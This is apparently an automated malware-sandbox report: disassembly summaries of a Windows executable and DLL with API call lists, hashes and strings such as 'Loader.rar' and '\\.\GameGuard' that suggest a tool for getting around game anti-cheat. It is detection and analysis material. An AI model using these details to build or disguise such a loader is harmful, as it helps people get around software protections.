                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$AllocateHeap_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3655941445-0
                                                                                                                                      • Opcode ID: 4d6f4ed6d0b295ba0e67948209c9a44690f4840c73e4b2451ebcc492b0c83afb
                                                                                                                                      • Instruction ID: c517ec776f7d3f27c079ca33454c19a5bd13ee017e9af4c02a393baf016c2f9c
                                                                                                                                      • Opcode Fuzzy Hash: 4d6f4ed6d0b295ba0e67948209c9a44690f4840c73e4b2451ebcc492b0c83afb
                                                                                                                                      • Instruction Fuzzy Hash: D9312970A443059BE700CF94DE80B9B73E4EB45728F68056DE9989F380D7BAE945CB92
                                                                                                                                      Function 0044A900 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 364COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset_strncmp
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 1033695413-2766056989
                                                                                                                                      • Opcode ID: eea5dde8e329d1df36d2b825219ab18361998e7433e7894f3ec084f1ce5c25ee
                                                                                                                                      • Instruction ID: ffaf4f742d5131444c09dd652f5d357f3a7620cc8e71509dd8459c989d0285c7
                                                                                                                                      • Opcode Fuzzy Hash: eea5dde8e329d1df36d2b825219ab18361998e7433e7894f3ec084f1ce5c25ee
                                                                                                                                      • Instruction Fuzzy Hash: F6F16D71E022289FEB24DF54DD91BEEB7B5AF85304F1081DAE009A7242DB746E84CF56
                                                                                                                                      Function 00498A5A Relevance: 9.0, APIs: 6, Instructions: 44threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00498A69
                                                                                                                                        • Part of subcall function 004A2D70: __FindPESection.LIBCMT ref: 004A2DCB
                                                                                                                                      • CloseHandle.KERNEL32(?,?,00498AC4), ref: 00498A8D
                                                                                                                                      • __freeptd.LIBCMT ref: 00498A94
                                                                                                                                      • RtlExitUserThread.NTDLL(00000000,00000000,?,00498AC4), ref: 00498A9D
                                                                                                                                      • __getptd.LIBCMT ref: 00498AAF
                                                                                                                                      • __XcptFilter.LIBCMT ref: 00498AD0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCurrentExitFilterFindHandleImageNonwritableSectionThreadUserXcpt__freeptd__getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3342091778-0
                                                                                                                                      • Opcode ID: 2e099ddf911c72f385158d725070589633cdfbef6461c1c2fa003e24fb213398
                                                                                                                                      • Instruction ID: c6a2c9ac4c31d29c2a85139f1cd20151bf69ebfd0d60f35c0c2144199c9aff7c
                                                                                                                                      • Opcode Fuzzy Hash: 2e099ddf911c72f385158d725070589633cdfbef6461c1c2fa003e24fb213398
                                                                                                                                      • Instruction Fuzzy Hash: 2001A234901601EFDF28A7A9D806FAE3B649F02715F20052FF5119A6E2CF6C9D54A698
                                                                                                                                      Function 69E9A6B0 Relevance: 9.0, APIs: 6, Instructions: 40timefileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?), ref: 69E9A6C7
                                                                                                                                      • GetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,69E9AA4F), ref: 69E9A6DF
                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 69E9A6EF
                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,69E9AA4F), ref: 69E9A6FF
                                                                                                                                      • FlushFileBuffers.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,69E9AA4F), ref: 69E9A706
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,69E9AA4F), ref: 69E9A70D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Time$BuffersCloseCreateDateFlushHandleLocal
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 674073760-0
                                                                                                                                      • Opcode ID: 29dfa136d9b94c38fb139043e34ddb9ae076b93dd83ea940440158c84091d9e3
                                                                                                                                      • Instruction ID: 96b36c303e1a8e96c68a0f8e71ab719a6a67326e3868cb486277869f3646f318
                                                                                                                                      • Opcode Fuzzy Hash: 29dfa136d9b94c38fb139043e34ddb9ae076b93dd83ea940440158c84091d9e3
                                                                                                                                      • Instruction Fuzzy Hash: D3F0AF32444241BBDB129B65DD49FEB3BACEF8F720F044508F24596080D675A3098762
                                                                                                                                      Function 00432B20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 00432BF2
                                                                                                                                      • _memset.LIBCMT ref: 00432C0F
                                                                                                                                      • SendMessageA.USER32(00000000,000083F6,00000000,00000000), ref: 00432CDE
                                                                                                                                        • Part of subcall function 00442060: _memset.LIBCMT ref: 00442071
                                                                                                                                      • CreateWindowExA.USER32(08080020,08080020,00000000,00000000,88000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00432DA9
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$CreateMessageSendWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 881501095-3916222277
                                                                                                                                      • Opcode ID: 9a84429cdb539ad3504b5e6cc3af757917bd9c67a0704557ef27fe3a6d9ac9c7
                                                                                                                                      • Instruction ID: 81ddd6d69c874bbbf1339d6b6620ce0c24bcb2cb524d393bcb994065668ed6e6
                                                                                                                                      • Opcode Fuzzy Hash: 9a84429cdb539ad3504b5e6cc3af757917bd9c67a0704557ef27fe3a6d9ac9c7
                                                                                                                                      • Instruction Fuzzy Hash: DB813C71A002199FDB24DF54CD89FEAB7B5FB48704F1441D9E608AB381D7B8AA84CF94
                                                                                                                                      Function 00426E70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 00426EC0
                                                                                                                                      • SendMessageA.USER32(?,00000402,?,00000000), ref: 00426F1C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID: i
                                                                                                                                      • API String ID: 3850602802-3865851505
                                                                                                                                      • Opcode ID: ea746df7342282da24670093a46bb5794d4d5ecda407dfa7d7d49f563447b9a3
                                                                                                                                      • Instruction ID: 3094a5b332580555f764f66656ed82e070255a70c15cc665ca6e45f73baa829c
                                                                                                                                      • Opcode Fuzzy Hash: ea746df7342282da24670093a46bb5794d4d5ecda407dfa7d7d49f563447b9a3
                                                                                                                                      • Instruction Fuzzy Hash: 9441BFB4A00318DBDB24DB50DC81FBA77B9FF59704F40819DE5086B281CA759E80CFA9
                                                                                                                                      Function 004655E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen
                                                                                                                                      • String ID: Loader.rar$Sierra.rar
                                                                                                                                      • API String ID: 4218353326-1807820092
                                                                                                                                      • Opcode ID: 57422c3bf0b163c758ad089826f06ca6a46719b1e3422fb87848dd1f26bdc497
                                                                                                                                      • Instruction ID: a741ec41b4c9b44ede0273bc145d1b93eaf9287e8b9873860511a5f4006a3e8e
                                                                                                                                      • Opcode Fuzzy Hash: 57422c3bf0b163c758ad089826f06ca6a46719b1e3422fb87848dd1f26bdc497
                                                                                                                                      • Instruction Fuzzy Hash: 9F413F70D04288DEDF01CBA9D8447DEBFF56F15308F184099D44477382E6BA5B58CBA6
                                                                                                                                      Function 69E87537 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E87549
                                                                                                                                      • _sprintf.LIBCMT ref: 69E8757A
                                                                                                                                      • CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000080,00000000), ref: 69E87596
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69E875A2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreateFileHandle_memset_sprintf
                                                                                                                                      • String ID: \\.\GameGuard
                                                                                                                                      • API String ID: 1524418005-1861004128
                                                                                                                                      • Opcode ID: 825217069052659d11b3a78ced1b2f29641832bfa1513b7b7a67b7d582f13321
                                                                                                                                      • Instruction ID: e847a8da80e4ee9eb69ccdfa3331e3e19d9e4b20d97a0f628e531777bab4f72b
                                                                                                                                      • Opcode Fuzzy Hash: 825217069052659d11b3a78ced1b2f29641832bfa1513b7b7a67b7d582f13321
                                                                                                                                      • Instruction Fuzzy Hash: E7F04C34A883406BD750D7649D06F8D37482F02325F64895CF6ED9A2C1FB75C20D83A3
                                                                                                                                      Function 00466470 Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$CloseHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 386230509-0
                                                                                                                                      • Opcode ID: e6af9272e342cceeec2d06006e8b39f39aab7b3f60ec9d8d24a4599931957886
                                                                                                                                      • Instruction ID: 2473fd9feef9589d19fa3f124085cc254321203b31932592af01d73d5932b231
                                                                                                                                      • Opcode Fuzzy Hash: e6af9272e342cceeec2d06006e8b39f39aab7b3f60ec9d8d24a4599931957886
                                                                                                                                      • Instruction Fuzzy Hash: 8C3161B5E00209BFDB04EFA4DC82FAFB779EB48700F104599F905A7384E635A951CBA5
                                                                                                                                      Function 0044EFA0 Relevance: 7.6, APIs: 5, Instructions: 94networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$socket
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1846529318-0
                                                                                                                                      • Opcode ID: 858086e007c7e81925f46723a5361de96f4438ac056678260f3e372963116659
                                                                                                                                      • Instruction ID: f821e496dd92e9439c5012ee5f21e246345c7ca09b2d8d645a98ddade2470a20
                                                                                                                                      • Opcode Fuzzy Hash: 858086e007c7e81925f46723a5361de96f4438ac056678260f3e372963116659
                                                                                                                                      • Instruction Fuzzy Hash: 254152B0900758AAEF20DF64DC55BEEB774AF44309F4041EDE5086B2C1DBB95A88CF99
                                                                                                                                      Function 69E8784D Relevance: 7.6, APIs: 5, Instructions: 79sleepfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E87430: _memset.LIBCMT ref: 69E87469
                                                                                                                                        • Part of subcall function 69E87430: _strncpy.LIBCMT ref: 69E87486
                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 69E878AA
                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 69E878B8
                                                                                                                                      • GetLastError.KERNEL32 ref: 69E878C7
                                                                                                                                      • _memset.LIBCMT ref: 69E878ED
                                                                                                                                      • _memset.LIBCMT ref: 69E87907
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$DeleteErrorFileLastSleep_strncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1394207256-0
                                                                                                                                      • Opcode ID: 2ce8e49157f9b134efcaf081838572fb0be60247e577a47f5786ead8957eddc6
                                                                                                                                      • Instruction ID: b01166f17b11ef717080e19c9a81392a32dd3aa03a0357b3f460e3b585571525
                                                                                                                                      • Opcode Fuzzy Hash: 2ce8e49157f9b134efcaf081838572fb0be60247e577a47f5786ead8957eddc6
                                                                                                                                      • Instruction Fuzzy Hash: 51210A766083819FD720D7F09A41B9F73D9AF8131CF50482DD59D83152EB359608C793
                                                                                                                                      Function 69E87852 Relevance: 7.6, APIs: 5, Instructions: 78sleepfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E87430: _memset.LIBCMT ref: 69E87469
                                                                                                                                        • Part of subcall function 69E87430: _strncpy.LIBCMT ref: 69E87486
                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 69E878AA
                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 69E878B8
                                                                                                                                      • GetLastError.KERNEL32 ref: 69E878C7
                                                                                                                                      • _memset.LIBCMT ref: 69E878ED
                                                                                                                                      • _memset.LIBCMT ref: 69E87907
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$DeleteErrorFileLastSleep_strncpy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1394207256-0
                                                                                                                                      • Opcode ID: ed822b9ec1cf0f98f0292d1443936b7eb02ce0f36a069ee1393a64eb1364978f
                                                                                                                                      • Instruction ID: 14a2e6c3294bc2b886506fd2801295b17006103eeea767b7c7d33d6dab739d8f
                                                                                                                                      • Opcode Fuzzy Hash: ed822b9ec1cf0f98f0292d1443936b7eb02ce0f36a069ee1393a64eb1364978f
                                                                                                                                      • Instruction Fuzzy Hash: 842129B67083819FD720DBF09A40B9F73E9AF8121CF50482DEA9D83152EB359608C793
                                                                                                                                      Function 0049C434 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0049C43A
                                                                                                                                        • Part of subcall function 0049FBA3: TlsGetValue.KERNEL32(?,0049C43F), ref: 0049FBAC
                                                                                                                                        • Part of subcall function 0049FBA3: TlsSetValue.KERNEL32(00000000,0049C43F), ref: 0049FBCD
                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 0049C445
                                                                                                                                        • Part of subcall function 0049FB83: TlsGetValue.KERNEL32(?,?,0049C44A,00000000), ref: 0049FB91
                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 0049C458
                                                                                                                                      • __freefls@4.LIBCMT ref: 0049C48E
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0049C4A1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Value$CurrentImageNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1213517137-0
                                                                                                                                      • Opcode ID: 760fcd26147916abf2ee93dc863155bb23d7555c9cf0e7f8819a2ac482cb9a45
                                                                                                                                      • Instruction ID: edc7eb74eab04e0ffb44a7af47d4ebe9b228c7891888172d34f7af8bd4b79d64
                                                                                                                                      • Opcode Fuzzy Hash: 760fcd26147916abf2ee93dc863155bb23d7555c9cf0e7f8819a2ac482cb9a45
                                                                                                                                      • Instruction Fuzzy Hash: C001F2741002056FCF08BF32C894D5F3F98AF9434C720883EB80487212DB3CE886D6A9
                                                                                                                                      Function 69EC0763 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __lock.LIBCMT ref: 69EC0781
                                                                                                                                        • Part of subcall function 69EC7D5D: __mtinitlocknum.LIBCMT ref: 69EC7D73
                                                                                                                                        • Part of subcall function 69EC7D5D: __amsg_exit.LIBCMT ref: 69EC7D7F
                                                                                                                                        • Part of subcall function 69EC7D5D: EnterCriticalSection.KERNEL32(?,?,?,69ED1AC7,00000004,69EE9288,0000000C,69EC8E49,?,?,00000000,00000000,00000000,?,69EC77E5,00000001), ref: 69EC7D87
                                                                                                                                      • ___sbh_find_block.LIBCMT ref: 69EC078C
                                                                                                                                      • ___sbh_free_block.LIBCMT ref: 69EC079B
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,69EE8B60,0000000C,69EC7D3E,00000000,69EE8F08,0000000C,69EC7D78,?,?,?,69ED1AC7,00000004,69EE9288,0000000C), ref: 69EC07CB
                                                                                                                                      • GetLastError.KERNEL32(?,69ED1AC7,00000004,69EE9288,0000000C,69EC8E49,?,?,00000000,00000000,00000000,?,69EC77E5,00000001,00000214), ref: 69EC07DC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
